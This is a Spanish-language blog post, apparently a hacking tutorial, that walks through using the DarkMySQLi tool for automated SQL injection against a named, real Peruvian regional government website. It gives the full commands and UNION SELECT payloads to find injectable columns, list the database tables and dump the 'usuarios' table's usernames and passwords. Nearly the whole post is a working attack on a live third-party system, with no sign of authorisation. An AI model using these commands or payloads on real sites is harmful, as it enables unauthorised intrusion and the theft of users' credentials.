DarkMySQLi es una herramienta de código abierto la cual nos permite
inyectar de forma automática y extraer la información de las base de
datos de una web.
Link de descarga : https://www.mediafire.com/?72fcrfb2mzy16mc
Vamos a la acción !
El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :
http://www.regionsanmartin.gob.pe/institucional/ini.php?Area='3Ejecutaremos el siguiente comando para el testeo de la web :
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol
como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi :
[!] darkMySQLi URL:
http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--
luego que sabemos que es vulnerable a la inyección pondremos el siguiente comando :
python darkMySQLi.py -u
"http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--"
--full
(solo reemplazamos el numero " 3 " por " darkc0de "
Como vemos nos a votado las
columnas de las base de datos clasificándolas por cada uno de ellas en
sus respectivas "tablas" de manera que podamos identificarlos fácilmente
los datos almacenados.
Lo que haremos a continuación sera dumpear las columnas de los usuarios con el siguiente comando :
python darkMySQLi.py -u
"http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--"
--dump -D regionsanmartin_gob_pe -T usuarios -C
nomb_usuario,pass,tipo_usuario
Imagen completa de usuarios
Espero les aya gustado mucho el Post, un saludo y un abrazo desde ICA-COLOMBIA"
No hay comentarios:
Publicar un comentario